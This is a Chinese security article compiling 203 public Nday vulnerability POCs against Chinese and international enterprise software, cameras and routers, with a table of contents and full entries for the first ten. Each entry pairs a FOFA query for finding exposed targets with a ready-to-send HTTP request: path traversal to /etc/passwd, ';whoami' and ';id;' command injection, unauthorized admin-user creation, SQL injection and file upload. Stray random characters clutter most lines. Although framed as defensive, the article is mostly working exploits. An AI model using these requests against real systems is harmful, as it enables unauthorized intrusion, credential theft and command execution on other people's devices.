互联网公开漏洞整理202309-202406# \( U) U ~% S, Y) `0 Q, S
道一安全 2024-06-05 07:41 北京
0 B- K8 _) K# i以下文章来源于网络安全新视界 ,作者网络安全新视界- Q, I) i: p# \ C6 C
; B- k/ a0 U& g& {+ m- A发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。6 D3 @& o9 q8 q% g2 q [, c8 V1 B1 |
3 J: b4 D1 d, y) q* |1 }; i! ~' N$ K! T漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
. l$ `! F3 N+ e1 r. `
$ f+ l+ G6 }) a! i/ l安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
+ s: h; D; U9 ^! _4 P2 M
( I9 a. z& u, U% l6 ^文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。* G9 t# k7 b) Z" O
" X5 R- c: @& q- U$ l) {5 K8 v
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。) s% ~1 j/ e/ Y7 W
J0 ]0 V `4 S" O
9 @5 ?% f8 n% _, s/ B9 d. }. h% r声明
$ ?& L, [4 t( Y
: b6 X, _9 P; L: k$ ]& q7 _9 ^7 G为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
6 l: p g0 G& T4 H) I% a( a1 @- n x1 I9 {$ D: B9 R4 z
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。3 {" _9 q* d6 m% `9 i. J$ {5 Y
8 S, x4 J* |# l6 @+ M5 L4 Z
/ r; n8 Y- }$ m2 `4 t
; y$ }! X" `" u目录1 U9 b/ W: `# `' N4 j4 X
# z9 [! B& r0 L+ d+ v5 [
016 [3 c6 v; y* z8 l1 _ g8 B9 c @
; l+ ]5 E) w& x" }" \
1. StarRocks MPP数据库未授权访问
! X$ }; g2 g& c% f- `! E2. Casdoor系统static任意文件读取
/ J O9 X* L5 X1 d: L3. EasyCVR智能边缘网关 userlist 信息泄漏! k% \' W7 c. E; M' I4 H: U) Q
4. EasyCVR视频管理平台存在任意用户添加
5 Q& `6 K9 ]$ m1 \6 g# ~( e$ `3 C5. NUUO NVR 视频存储管理设备远程命令执行
) u) R' r2 V1 j5 z/ }3 n; C, ~6. 深信服 NGAF 任意文件读取
# ?; s( P: _4 g% {7. 鸿运主动安全监控云平台任意文件下载0 [1 _5 C& @. m
8. 斐讯 Phicomm 路由器RCE
3 d# M1 Z# a% Y3 r9. 稻壳CMS keyword 未授权SQL注入1 m% ~# h0 d! J" |0 T
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
0 {/ G) n9 ~/ q11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入 u$ ^) k/ m: b4 H; a0 |
12. Jorani < 1.0.2 远程命令执行
& }1 J1 _# x/ s K13. 红帆iOffice ioFileDown任意文件读取
$ H0 H$ ^- X# U! e* G* {- b7 a+ A R14. 华夏ERP(jshERP)敏感信息泄露
3 V z* o" C/ ~# ^+ j15. 华夏ERP getAllList信息泄露2 s4 v! B7 y* L2 X0 C7 a
16. 红帆HFOffice医微云SQL注入
: V: ?' h" v7 ? v, c17. 大华 DSS itcBulletin SQL 注入
6 x5 ~# _5 h Y: N5 z5 Q18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
& U$ H& A. w1 L% W9 C5 O3 c9 a19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
& @1 a$ E$ [) d! a2 z8 K/ E20. 大华ICC智能物联综合管理平台任意文件读取6 K% T( ^3 a7 `! j
21. 大华ICC智能物联综合管理平台random远程代码执行
9 w5 Z- L. P: ?22. 大华ICC智能物联综合管理平台 log4j远程代码执行
1 u; r& K% f" `5 A23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
( M9 ?$ X; W) Z24. 用友NC 6.5 accept.jsp任意文件上传
1 ?! @6 B( {3 }5 C25. 用友NC registerServlet JNDI 远程代码执行
$ ?( p) g$ L& T5 a; [5 X- n* }26. 用友NC linkVoucher SQL注入1 h9 }' c8 u" z" h
27. 用友 NC showcontent SQL注入; h( q0 ~' Q% N( q1 k ?/ @6 |4 o( q
28. 用友NC grouptemplet 任意文件上传
: k+ z0 `- Y8 c1 s; s& U |29. 用友NC down/bill SQL注入" E, u `* k. }
30. 用友NC importPml SQL注入
. t0 A0 Y* ?7 |$ x B31. 用友NC runStateServlet SQL注入2 m# b4 F: ~4 x, T
32. 用友NC complainbilldetail SQL注入
: \; J% O" r, }0 k. V6 r6 k33. 用友NC downTax/download SQL注入
4 X6 L" `5 N4 @* G34. 用友NC warningDetailInfo接口SQL注入
/ J. [. c, S7 \35. 用友NC-Cloud importhttpscer任意文件上传: T3 n" N9 E2 {5 F* U7 U# x9 e
36. 用友NC-Cloud soapFormat XXE
* C& {1 h' D \7 p/ |, N37. 用友NC-Cloud IUpdateService XXE
k3 l0 Y5 ^' L5 e6 i$ j5 u38. 用友U8 Cloud smartweb2.RPC.d XXE* ~+ P: r0 v0 C; R m" g! F
39. 用友U8 Cloud RegisterServlet SQL注入
' |1 p, F# P# P% s40. 用友U8-Cloud XChangeServlet XXE$ K+ _2 |' v) }( h6 [2 R$ p2 C
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
4 V @) T4 P; \) d/ i% |/ [+ ]4 d42. 用友GRP-U8 SmartUpload01 文件上传/ O5 t% x) [# y5 w1 T7 Q$ W8 d0 u
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
) t/ d1 A* F8 F N44. 用友GRP-U8 bx_dj_check.jsp SQL注入
& B( P. T2 [2 t9 q! C- B' H45. 用友GRP-U8 ufgovbank XXE
: o8 Q! K8 I) `2 G3 U0 |/ Q46. 用友GRP-U8 sqcxIndex.jsp SQL注入$ _/ {% N5 W% C2 W4 ?3 `) r9 k$ q
47. 用友GRP A++Cloud 政府财务云 任意文件读取
$ g7 R' C; ~& }1 ^& i" L48. 用友U8 CRM swfupload 任意文件上传
+ L- a: y" \9 E6 ], X4 T- K49. 用友U8 CRM系统uploadfile.php接口任意文件上传
3 m% R- G0 m8 x50. QDocs Smart School 6.4.1 filterRecords SQL注入( \' e0 R4 n& u
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入6 N F- L9 Z$ t- Q* }. ^* w& g
52. 泛微E-Office json_common.php sql注入 H7 _ a8 j' f+ k% e6 Q
53. 迪普 DPTech VPN Service 任意文件上传
# G, `, K3 R$ ?4 s2 g! X1 B54. 畅捷通T+ getstorewarehousebystore 远程代码执行
( ~: u- X' z. p4 M55. 畅捷通T+ getdecallusers信息泄露
: K+ u- M: c5 t2 J56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE, k9 R9 l5 a' p" \+ e+ m( T4 \
57. 畅捷通T+ keyEdit.aspx SQL注入) ~6 a) a. l! A1 b( E
58. 畅捷通T+ KeyInfoList.aspx sql注入4 \( n! l( r/ q# p8 C' [+ j
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
4 J0 k* K$ ]8 ?5 M- L, N5 | _7 T60. 百卓Smart管理平台 importexport.php SQL注入
3 |# k4 W' T' p& x' W$ X61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
* T: J/ n) W7 h& Y) w2 l62. IP-guard WebServer 远程命令执行( t% t7 @( H* G* [, j& @, H
63. IP-guard WebServer任意文件读取# J: g' R1 _% g) Q
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
, t C1 h+ J/ C6 \65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
( ^9 u; F- c+ g8 |4 r66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入( X- W) Y: g# \( D
67. 万户ezOFFICE wpsservlet任意文件上传
! f. `8 Y; j9 ^# J3 N3 S8 U68. 万户ezOFFICE wf_printnum.jsp SQL注入
$ x* o! W. L9 s9 t3 F: T9 H+ o1 c3 f69. 万户 ezOFFICE contract_gd.jsp SQL注入
' y/ q, [3 v6 L, I _70. 万户ezEIP success 命令执行
# Q: t0 ]/ J: x- H+ F71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
& h/ B8 A" T, ^72. 致远OA getAjaxDataServlet XXE
# e4 M: G% C$ J( s+ h: N1 \73. GeoServer wms远程代码执行% g# f1 X% [) P( K& y8 j9 C' o
74. 致远M3-server 6_1sp1 反序列化RCE5 _' s- t4 u6 n3 E( U
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
6 ]" \+ M, y+ ]8 D76. 新开普掌上校园服务管理平台service.action远程命令执行 g7 i5 m8 [& x; S% M7 j
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
! j2 G! y! d$ r2 H) x5 Y( e. {78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传/ ~) X/ O( C) v# Q g9 K% E8 c
79. BYTEVALUE 百为流控路由器远程命令执行
, p: w4 m) E! X, N$ h80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
2 \2 K7 Q+ J* [$ p' L81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
' x% u6 }# C! t. B# J82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行3 e" P6 W& ~% C" k8 _9 m
83. JeecgBoot testConnection 远程命令执行$ p! m' O, ~! a# j: b
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入# V, i# P5 x5 `4 W5 @
85. SysAid On-premise< 23.3.36远程代码执行
- h+ N5 B$ b% ^( V7 g) F! U0 |86. 日本tosei自助洗衣机RCE
1 U. x) x: U( N! x: Y$ j& L87. 安恒明御安全网关aaa_local_web_preview文件上传( y1 \3 r7 N+ O
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行9 \2 Z+ N- D3 s' Z; \& c; Z: c
89. 致远互联FE协作办公平台editflow_manager存在sql注入
9 J- z/ |* i8 B, Q$ i" M90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
" D4 T' O* c3 H1 ~6 R91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
5 X4 `; }% t% P$ r92. 海康威视运行管理中心session命令执行
( j7 S$ n; \/ A6 e) G93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
' N9 j, H) ~* _8 v0 o- A; D% C94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传( F! G- e7 Y) c+ Z& Z
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
* {5 F" t S, O4 a: y0 H! d96. Apache OFBiz 18.12.11 groovy 远程代码执行
/ ]( I( B( R, e% u( z4 N97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行, W7 n6 M: z' [$ s4 e$ ` t0 l
98. SpiderFlow爬虫平台远程命令执行
9 C. P$ r5 j9 h& H9 X2 ?9 }99. Ncast盈可视高清智能录播系统busiFacade RCE
1 I, N0 A" M3 a/ K. d100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
( C( W1 z9 Z& ]* ~& y101. ivanti policy secure-22.6命令注入# I7 ]8 ?0 ^# s$ ]1 c( [3 p% \
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
# _( w! N2 ^4 Q3 v103. Ivanti Pulse Connect Secure VPN XXE
3 ~' [5 J0 X- c* |104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
7 T* g) o' u! P8 v, A+ R5 ~7 E1 m105. SpringBlade v3.2.0 export-user SQL 注入* V5 G% }+ n! ~1 |# b' @+ j
106. SpringBlade dict-biz/list SQL 注入- |. O8 _2 l }' u6 p) m
107. SpringBlade tenant/list SQL 注入, F" r6 l, G5 @1 ?( t! W E' ]
108. D-Tale 3.9.0 SSRF4 s. w" ]0 B$ ^; p
109. Jenkins CLI 任意文件读取
8 W) t" @* X) }' P7 S110. Goanywhere MFT 未授权创建管理员) h, C- t! p% X3 N" [5 ]
111. WordPress Plugin HTML5 Video Player SQL注入
6 F B; b) [ g112. WordPress Plugin NotificationX SQL 注入# ]7 s* V' b1 X; n9 ~) T' Z5 s
113. WordPress Automatic 插件任意文件下载和SSRF
2 _2 w, `1 `, y/ D, h8 A114. WordPress MasterStudy LMS插件 SQL注入& W) ` C' j) \& ]' S A* O
115. WordPress Bricks Builder <= 1.9.6 RCE
" @4 S8 m3 v5 P5 |3 |( W$ g116. wordpress js-support-ticket文件上传3 Z$ {. A2 J0 ?, B P& q
117. WordPress LayerSlider插件SQL注入2 D q! a+ {( J( g" |
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传1 s- m: m9 F) w& E0 O o: e
119. 北京百绰智能S20后台sysmanageajax.php sql注入
7 L& \4 X% {3 @& g120. 北京百绰智能S40管理平台导入web.php任意文件上传7 ~# U ~2 q6 c( _
121. 北京百绰智能S42管理平台userattestation.php任意文件上传! f& l2 ]4 ~% k
122. 北京百绰智能s200管理平台/importexport.php sql注入
4 y, v! B5 y) g9 c s5 n) d2 Q* ^123. Atlassian Confluence 模板注入代码执行; m& k5 L! Z: y$ {
124. 湖南建研工程质量检测系统任意文件上传
$ Y' E, Q& P- x; b9 o. j: e+ }125. ConnectWise ScreenConnect身份验证绕过
* f$ C) J/ J5 p4 L126. Aiohttp 路径遍历
' h! L% ]8 G7 U2 E) X/ H127. 广联达Linkworks DataExchange.ashx XXE7 Z, U3 ~1 J# [2 c m& u
128. Adobe ColdFusion 反序列化
+ ^" a) l: C: b. U5 c, [! q$ ]/ {129. Adobe ColdFusion 任意文件读取
- `$ F) H0 F2 k) W/ s0 K130. Laykefu客服系统任意文件上传
# F6 z2 } s/ j3 W8 Y: M131. Mini-Tmall <=20231017 SQL注入
7 {: G5 a' V) u132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过' V8 a+ N/ d h8 ~
133. H5 云商城 file.php 文件上传
) o4 _7 h: Q: k+ J5 \; M O' E$ P134. 网康NS-ASG应用安全网关index.php sql注入9 N. j' g( f( Z/ ]4 B$ ?" a
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入3 g+ t3 p. r% n" O% H/ b2 W
136. NextChat cors SSRF/ L- T$ z6 j: g0 h2 a- |4 s
137. 福建科立迅通信指挥调度平台down_file.php sql注入& ^5 ]$ |6 ~% B6 t3 _
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入4 `3 W) ~8 [2 p+ N( M
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
# `: @8 @6 H3 _+ s140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
+ C5 G% c) M4 j9 ^% N# B141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入) I6 a. ` D6 a8 w' f1 P
142. CMSV6车辆监控平台系统中存在弱密码
" V9 B* q6 L) z143. Netis WF2780 v2.1.40144 远程命令执行
9 x1 o& ^: o8 x$ e1 b J: z144. D-Link nas_sharing.cgi 命令注入
7 v& F# C6 f( V1 i, U145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
2 y0 E3 u, Y o P) x i; U146. MajorDoMo thumb.php 未授权远程代码执行6 x$ z% j# d% S8 b
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
0 ]1 S2 N. r* B& l: L148. CrushFTP 认证绕过模板注入1 H2 @" w8 F5 l% b. {
149. AJ-Report开源数据大屏存在远程命令执行+ [/ y& p* K* B- d% t- V! A
150. AJ-Report 1.4.0 认证绕过与远程代码执行
; ~5 e& | t+ ?6 k. n151. AJ-Report 1.4.1 pageList sql注入
$ m; E. F: F' g% a* b z152. Progress Kemp LoadMaster 远程命令执行: n2 [. N/ I( ?& ]' t& U
153. gradio任意文件读取/ A5 _( D: A, f3 K% u
154. 天维尔消防救援作战调度平台 SQL注入. y2 v, z1 T4 O* F
155. 六零导航页 file.php 任意文件上传- Y, b h ^& s; u% i
156. TBK DVR-4104/DVR-4216 操作系统命令注入
% U) E% A- B3 w) S8 X0 P3 l157. 美特CRM upload.jsp 任意文件上传4 {6 ], U6 D/ B$ ]6 t8 ]
158. Mura-CMS-processAsyncObject存在SQL注入; A, }2 J, P' i ^% g, |" f
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
( g* N. p' K: y2 {( p$ }" M0 V160. Sonatype Nexus Repository 3目录遍历与文件读取
% }4 b v- t, K* B161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传 b5 G2 q/ H2 C1 o% k' |
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传5 Z( R& B7 w+ @. a% h- J2 k7 h( J
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传+ B3 ]+ s- j: ^5 t4 R: h
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
9 O; z( x+ R9 s+ H165. OrangeHRM 3.3.3 SQL 注入3 m1 N. i/ `' K, E3 C
166. 中成科信票务管理平台SeatMapHandler SQL注入
( v" G- H+ t) @: O% `167. 精益价值管理系统 DownLoad.aspx任意文件读取/ A. m3 t+ S0 M. Q
168. 宏景EHR OutputCode 任意文件读取1 P: n1 j, Y3 O
169. 宏景EHR downlawbase SQL注入
* T, g% J& F, u% t1 j- ]4 w0 f; L170. 宏景EHR DisplayExcelCustomReport 任意文件读取
1 `1 ?3 o5 Y! C9 c171. 通天星CMSV6车载定位监控平台 SQL注入5 H8 E; n6 X1 P/ V: S4 ]' X
172. DT-高清车牌识别摄像机任意文件读取& o* T' T( _7 X5 ^1 i: N
173. Check Point 安全网关任意文件读取
$ K9 Z: D. Y- b. {1 u0 e174. 金和OA C6 FileDownLoad.aspx 任意文件读取
4 w& H N% x0 K9 T175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入" p+ `* R6 k( ~& q* U# }
176. 电信网关配置管理系统 rewrite.php 文件上传; `9 k, M X3 d" I# ^, ^
177. H3C路由器敏感信息泄露8 I( d2 B8 {( B9 Z
178. H3C校园网自助服务系统-flexfileupload-任意文件上传! Q* }6 I0 C! L4 ?- A+ o
179. 建文工程管理系统存在任意文件读取
! D# }) s: D2 l, K* q+ u+ {* [: j180. 帮管客 CRM jiliyu SQL注入
8 t9 m: { x; l+ ^181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
7 e8 C) z# y1 h$ n4 E6 l182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建& {* q& x8 R7 X5 W$ {# ^9 {
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入% j$ ~$ D$ u. [- U) e k
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
( S# e0 \* T( a \) k" v. O185. 瑞友天翼应用虚拟化系统SQL注入+ p+ \$ A5 y" D6 J: v! \
186. F-logic DataCube3 SQL注入
. c6 b4 X7 \4 g V187. Mura CMS processAsyncObject SQL注入7 `, e4 q5 r" E* K4 o P
188. 叁体-佳会视频会议 attachment 任意文件读取
5 f4 T; [4 e8 v- W: @189. 蓝网科技临床浏览系统 deleteStudy SQL注入
9 Q2 S; Z; o$ `$ `2 h190. 短视频矩阵营销系统 poihuoqu 任意文件读取- D) ^4 K3 ]" d. w" ]5 K
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入8 L8 H- C$ ^" d( L2 U' ^5 m% y
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传 w, S! ~' @! W8 Y; U
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行4 V9 h+ {- `8 E2 {* ?) C
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传+ L( v+ I7 ^5 C: C8 m+ u
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行( G4 o- T) c& ?: _6 Q# |+ T
196. 河南省风速科技统一认证平台密码重置9 I0 `4 W1 |5 G3 f2 u" z
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入7 k& j; y; B# v& c7 W
198. 阿里云盘 WebDAV 命令注入
' b/ v5 ] B5 X6 J199. cockpit系统assetsmanager_upload接口 文件上传; \. i( n# l1 b( U$ U
200. SeaCMS海洋影视管理系统dmku SQL注入
/ P0 T: i3 u8 F# c& V% x" z5 R201. 方正全媒体新闻采编系统 binary SQL注入
* F: ~- I. o9 D1 g! r202. 微擎系统 AccountEdit任意文件上传
& x5 l3 i1 H9 x+ S! p/ x203. 红海云EHR PtFjk 文件上传
' L. D7 ]) @3 @8 G
9 y3 l, c/ F% _" b- f; WPOC列表
; v& O) H# `* U: K% ^! S. M$ O. f S! o1 R) M& J/ C6 @0 A9 u5 p
02
/ S3 n {7 n) m, h( L7 ~# l. D6 e; v5 i9 X
1. StarRocks MPP数据库未授权访问0 N* C/ j4 l8 v2 ~% F
FOFA :title="StarRocks"4 D2 c8 t) v$ |- Y# q
GET /mem_tracker HTTP/1.1
$ Y, ^! l. ]$ F$ T$ _+ GHost: URL
3 s) F1 O7 t4 U3 A. Q6 X
w2 Q L, Y4 K9 o p4 p7 {- Q- F% Z, Q" m' j: y) K
2. Casdoor系统static任意文件读取
4 B/ u# N/ J3 hFOFA :title="Casdoor"/ y$ X5 }* j4 @6 Z2 U, |5 t
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
* K( S) a5 ~/ D _ l5 DHost: xx.xx.xx.xx:9999" ]' a! [) t( I8 T+ I; }
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 h) Q' N* {) h( F
Connection: close$ x6 C4 g7 |# K6 ]( E& v+ Z% y* v
Accept: */*$ P+ ~7 G6 }: s. w, Q6 G" W
Accept-Language: en
7 M' t# M" f4 N1 T4 _Accept-Encoding: gzip0 n: i G5 e" Y) B# j5 \- H
8 u; M& V5 F# [8 a6 g0 J& @* K8 v- c% @: p+ j
3. EasyCVR智能边缘网关 userlist 信息泄漏; X4 t( {' W, l0 v0 x2 ~# b6 I
FOFA :title="EasyCVR"+ q5 j3 {; S |
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
7 B- r' S2 B- b4 B5 U `4 OHost: xx.xx.xx.xx9 B" b- L k' d7 ]3 [3 k6 J
! }# z& O) d+ N# }
2 {* a. C4 i2 M+ {9 P4. EasyCVR视频管理平台存在任意用户添加
/ B/ z! p Q7 v2 y0 GFOFA :title="EasyCVR"
& x! j0 L7 r$ X( a( ^( s& a( r- V% W# T$ R) i, D) v
password更改为自己的密码md5
1 F: H3 Z+ u1 n9 F0 Y' PPOST /api/v1/adduser HTTP/1.14 j `! c- f1 g5 H. c0 _
Host: your-ip! x. d' V7 P& N! B4 y- b
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
5 l& ]8 z: Y3 J ?* s {5 i( @$ h, U+ H4 z: c7 d9 Z
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
4 L$ j: b; Z9 A0 `. f; M& v$ Z+ w1 Z! ?; b6 s
0 i* c6 l8 F ~+ j. f& c
5. NUUO NVR 视频存储管理设备远程命令执行5 B- I9 b$ {$ ]5 F0 F0 `0 \
FOFA:title="Network Video Recorder Login"
- a0 E! S& [- K% s, Y/ w; qGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
5 A" k, u! E# l _# U* |: _$ SHost: xx.xx.xx.xx: @ m0 Y0 z9 p; [
( r' v) {8 S. k# B5 S
8 N H. P: U# P- S' z8 J6. 深信服 NGAF 任意文件读取
5 L" Z" a N5 D' Y9 r6 qFOFA:title="SANGFOR | NGAF"8 G4 `( H+ o) W4 H# e. L
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.12 x% d$ v5 {1 x
Host:
2 A c8 m- v% `" s- G
* n4 I- n! X* R4 D4 U+ F
! x: u, F7 B f. _9 i7. 鸿运主动安全监控云平台任意文件下载9 @0 \, p; [ ^. `5 }4 \1 f
FOFA:body="./open/webApi.html"
, \- u- R% o0 d7 E+ G; p5 v3 V* wGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.19 A9 w; E7 S. E H/ Q+ B* ]- w# i
Host:
, d9 G7 N7 {- M- _1 W: c
) E W/ ]- P8 J" O9 Q& O! C) t) h5 }8 g/ B* |, f2 Q) Q' b
8. 斐讯 Phicomm 路由器RCE: h A' g: R9 I3 N
FOFA:icon_hash="-1344736688"2 ~* ^- E" J9 v! p" \4 f0 O" w# h
默认账号admin登录后台后,执行操作( p0 r. G) Q4 y4 Y
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
+ r& d; H' {/ S- THost: x.x.x.x/ C+ n4 T- G) F
Cookie: sysauth=第一步登录获取的cookie' E) e4 j: l7 F6 s7 U; O* }1 `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz! y: j" s- W0 V( J i" E6 I
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 z* [2 ~: Y# E" l6 N, {
$ D H/ l2 I6 {+ l" B. r
------WebKitFormBoundaryxbgjoytz
( h5 Z" h& e8 k9 `Content-Disposition: form-data; name="wifiRebootEnablestatus"
% `" l: N2 }1 v+ S$ o
) ^, n/ w& O4 v2 V%s
8 _9 Y M& F# d2 U+ F$ X- e6 O------WebKitFormBoundaryxbgjoytz
( y' L. b) S. N* V9 [- y; y3 TContent-Disposition: form-data; name="wifiRebootrange"
/ b& t2 ]7 ~: |; \" k& I& _ N+ k6 K4 j* E
12:00; id;2 ]4 V) {( l- m7 s! Y! Y/ a1 n3 H
------WebKitFormBoundaryxbgjoytz' F" J" U5 I+ l" d. O/ G
Content-Disposition: form-data; name="wifiRebootendrange"
/ q( o# n0 u8 I3 j; e+ V3 x
: V7 S) {4 C9 a9 d& n: J, r! c%s:) P) I, l$ n( M% d# H9 W9 t
------WebKitFormBoundaryxbgjoytz9 R e `- O2 l$ O! W% M& E
Content-Disposition: form-data; name="cururl2" z- F- x( M2 r
4 Y' b6 F1 a9 c) K4 Y
8 y+ w/ \+ V" k4 N1 ^ d
------WebKitFormBoundaryxbgjoytz--5 B1 X8 D$ P+ y6 U! B ^2 z
) D( L, v3 T. o& ~0 ?
% p H% W3 N; r! G0 G; @9. 稻壳CMS keyword 未授权SQL注入
7 O% N( N, b5 G, C1 c8 i4 w% GFOFA:app="Doccms"+ z# I& F% w' d' z
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
7 ?' ~, z( W' p7 ^8 r, B% ^Host: x.x.x.x: x8 q2 T7 P8 j% e9 h
1 p6 G( H$ F+ t7 Z3 g" R5 `4 `: {
9 t) ]. K8 c& r) N. Spayload为下列语句的二次Url编码
& ~& o0 u% y3 v! m1 i. l; u
+ k% [2 K B1 }) p6 s+ ~' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#" O2 B4 B9 ]6 w* V M
; q0 k+ O/ \* k ]% [10. 蓝凌EIS智慧协同平台api.aspx任意文件上传+ ^0 A) l1 Y* C2 E2 [
FOFA:icon_hash="953405444"
0 @6 I2 }! A2 H' q. q( ]
' x: d3 U4 S. V, k3 N文件上传后响应中包含上传文件的路径
- g( R0 B! D$ C9 c. ]POST /eis/service/api.aspx?action=saveImg HTTP/1.11 U' p0 N: o7 d6 P, b4 y V
Host: x.x.x.x:xx( a2 Z1 m3 D: C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.366 m' E* v+ z2 G0 T6 N- d8 n
Content-Length: 197" x0 [$ p& F3 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
`8 G$ x$ ~5 _Accept-Encoding: gzip, deflate9 R& H5 \9 x( F3 `1 I1 _( n
Accept-Language: zh-CN,zh;q=0.9. u8 r5 t4 _* z8 @" Z
Connection: close- @+ s) G, q& c9 K+ e# E
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
/ h# J1 p/ A {6 i' ]" U; U m& _
3 ^$ g5 r: N7 _2 O- a- k2 K------WebKitFormBoundaryxdgaqmqu
+ v/ N+ Z" y' D. w& n0 B2 L0 TContent-Disposition: form-data; name="file"filename="icfitnya.txt"
& c' W( q% ^7 @; A6 s7 oContent-Type: text/html
1 o% I3 a* a' t" V/ \" y. O0 M8 n
. Q( M. D/ G' ~; Fjmnqjfdsupxgfidopeixbgsxbf& W- w7 f9 a; H& ]
------WebKitFormBoundaryxdgaqmqu--# Q. j# \+ k( ]1 ^0 m
$ U3 U+ K% k9 V2 z B4 V3 E
! \) j* ]- k* N
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
8 N! p6 T1 f( H: S* cFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
